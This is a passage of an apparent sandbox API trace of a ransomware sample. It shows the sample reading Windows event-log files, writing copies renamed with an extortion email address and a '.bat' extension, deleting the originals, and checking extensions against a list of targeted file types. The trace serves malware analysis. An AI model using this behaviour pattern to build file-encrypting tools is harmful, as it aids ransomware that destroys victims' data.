(in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0061.690] ReadFile (in: hFile=0x2c0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x1010, lpOverlapped=0x0) returned 1 [0061.699] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x1020, lpOverlapped=0x0) returned 1 [0061.702] ReadFile (in: hFile=0x2c0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.702] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x162, lpOverlapped=0x0) returned 1 [0061.702] SetEndOfFile (hFile=0x37c) returned 1 [0061.702] CloseHandle (hObject=0x37c) returned 1 [0061.887] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.887] SetEndOfFile (hFile=0x2c0) returned 1 [0061.888] CloseHandle (hObject=0x2c0) returned 1 [0061.888] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.889] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 1 [0061.889] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.889] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.889] lstrlenW (lpString=".doc") returned 4 [0061.889] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString=".docx") returned 5 [0061.889] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.889] lstrlenW (lpString=".pdf") returned 4 [0061.889] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString=".xls") returned 4 [0061.889] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString=".xlsx") returned 5 [0061.889] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.889] lstrlenW (lpString=".ppt") returned 4 [0061.889] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.889] lstrlenW (lpString=".zip") returned 4 [0061.889] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString=".rar") returned 4 [0061.889] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString=".bz2") returned 4 [0061.889] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.889] lstrlenW (lpString=".7z") returned 3 [0061.889] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.890] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.890] lstrlenW (lpString=".dbf") returned 4 [0061.890] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.890] lstrlenW (lpString=".1cd") returned 4 [0061.890] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.890] lstrlenW (lpString=".jpg") returned 4 [0061.890] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.890] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.890] lstrlenW (lpString=".doc") returned 4 [0061.890] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString=".docx") returned 5 [0061.890] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.890] lstrlenW (lpString=".pdf") returned 4 [0061.890] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString=".xls") returned 4 [0061.890] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString=".xlsx") returned 5 [0061.890] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.890] lstrlenW (lpString=".ppt") returned 4 [0061.890] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.890] lstrlenW (lpString=".zip") returned 4 [0061.890] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString=".rar") returned 4 [0061.890] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.890] lstrlenW (lpString=".bz2") returned 4 [0061.891] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.891] lstrlenW (lpString=".7z") returned 3 [0061.891] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.891] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.891] lstrlenW (lpString=".dbf") returned 4 [0061.891] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.891] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.891] lstrlenW (lpString=".1cd") returned 4 [0061.891] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.891] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0061.891] lstrlenW (lpString=".jpg") returned 4 [0061.891] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.891] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.891] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Operational.evtx") returned 48 [0061.891] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0063.053] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1118208) returned 1 [0063.053] CloseHandle (hObject=0x37c) returned 1 [0063.053] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 0x20 [0063.053] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.053] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0063.053] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.053] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.053] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0063.053] GetLastError () returned 0x0 [0063.053] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0063.124] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0063.138] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11010, lpOverlapped=0x0) returned 1 [0063.492] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11020, lpOverlapped=0x0) returned 1 [0063.496] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.497] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x134, lpOverlapped=0x0) returned 1 [0063.497] SetEndOfFile (hFile=0x2c0) returned 1 [0063.497] CloseHandle (hObject=0x2c0) returned 1 [0063.516] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.517] SetEndOfFile (hFile=0x37c) returned 1 [0063.518] CloseHandle (hObject=0x37c) returned 1 [0063.518] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.518] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 1 [0063.518] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.518] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.518] lstrlenW (lpString=".doc") returned 4 [0063.518] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.518] lstrlenW (lpString=".docx") returned 5 [0063.518] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.519] lstrlenW (lpString=".pdf") returned 4 [0063.519] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.519] lstrlenW (lpString=".xls") returned 4 [0063.519] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.519] lstrlenW (lpString=".xlsx") returned 5 [0063.519] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.519] lstrlenW (lpString=".ppt") returned 4 [0063.519] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.576] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.576] lstrlenW (lpString=".zip") returned 4 [0063.576] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.576] lstrlenW (lpString=".rar") returned 4 [0063.577] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString=".bz2") returned 4 [0063.577] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString=".7z") returned 3 [0063.577] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.577] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.577] lstrlenW (lpString=".dbf") returned 4 [0063.577] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.577] lstrlenW (lpString=".1cd") returned 4 [0063.577] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.577] lstrlenW (lpString=".jpg") returned 4 [0063.577] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.577] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.577] lstrlenW (lpString=".doc") returned 4 [0063.577] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString=".docx") returned 5 [0063.577] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.577] lstrlenW (lpString=".pdf") returned 4 [0063.577] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString=".xls") returned 4 [0063.577] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString=".xlsx") returned 5 [0063.577] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.577] lstrlenW (lpString=".ppt") returned 4 [0063.577] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.577] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.577] lstrlenW (lpString=".zip") returned 4 [0063.578] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.578] lstrlenW (lpString=".rar") returned 4 [0063.578] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.578] lstrlenW (lpString=".bz2") returned 4 [0063.578] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.578] lstrlenW (lpString=".7z") returned 3 [0063.578] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.578] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.578] lstrlenW (lpString=".dbf") returned 4 [0063.578] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.578] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.578] lstrlenW (lpString=".1cd") returned 4 [0063.578] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.578] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0063.619] lstrlenW (lpString=".jpg") returned 4 [0063.620] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.206] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.206] lstrlenW (lpString="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 49 [0064.206] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.206] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.207] CloseHandle (hObject=0x370) returned 1 [0064.207] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 0x20 [0064.207] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.207] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.207] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.207] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.207] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.207] GetLastError () returned 0x0 [0064.207] ReadFile (in: hFile=0x370, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.210] WriteFile (in: hFile=0x368, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.212] ReadFile (in: hFile=0x370, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.212] WriteFile (in: hFile=0x368, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x136, lpOverlapped=0x0) returned 1 [0064.212] SetEndOfFile (hFile=0x368) returned 1 [0064.212] CloseHandle (hObject=0x368) returned 1 [0064.215] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.215] SetEndOfFile (hFile=0x370) returned 1 [0064.216] CloseHandle (hObject=0x370) returned 1 [0064.217] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.217] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 1 [0064.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.217] lstrlenW (lpString=".doc") returned 4 [0064.217] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.217] lstrlenW (lpString=".docx") returned 5 [0064.217] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.217] lstrlenW (lpString=".pdf") returned 4 [0064.217] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.217] lstrlenW (lpString=".xls") returned 4 [0064.217] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.217] lstrlenW (lpString=".xlsx") returned 5 [0064.217] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.217] lstrlenW (lpString=".ppt") returned 4 [0064.217] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.217] lstrlenW (lpString=".zip") returned 4 [0064.218] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".rar") returned 4 [0064.218] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".bz2") returned 4 [0064.218] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".7z") returned 3 [0064.218] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.218] lstrlenW (lpString=".dbf") returned 4 [0064.218] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.218] lstrlenW (lpString=".1cd") returned 4 [0064.218] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.218] lstrlenW (lpString=".jpg") returned 4 [0064.218] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.218] lstrlenW (lpString=".doc") returned 4 [0064.218] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".docx") returned 5 [0064.218] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.218] lstrlenW (lpString=".pdf") returned 4 [0064.218] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".xls") returned 4 [0064.218] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".xlsx") returned 5 [0064.218] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.218] lstrlenW (lpString=".ppt") returned 4 [0064.218] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.218] lstrlenW (lpString=".zip") returned 4 [0064.218] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.218] lstrlenW (lpString=".rar") returned 4 [0064.219] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.219] lstrlenW (lpString=".bz2") returned 4 [0064.219] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.219] lstrlenW (lpString=".7z") returned 3 [0064.219] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.219] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.219] lstrlenW (lpString=".dbf") returned 4 [0064.219] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.219] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.219] lstrlenW (lpString=".1cd") returned 4 [0064.219] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.219] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0064.219] lstrlenW (lpString=".jpg") returned 4 [0064.219] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.219] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.219] lstrlenW (lpString="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 63 [0064.219] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.219] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.219] CloseHandle (hObject=0x370) returned 1 [0064.219] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 0x20 [0064.220] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.220] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.220] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.220] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.220] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.222] GetLastError () returned 0x0 [0064.222] ReadFile (in: hFile=0x370, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.238] WriteFile (in: hFile=0x368, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.241] ReadFile (in: hFile=0x370, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 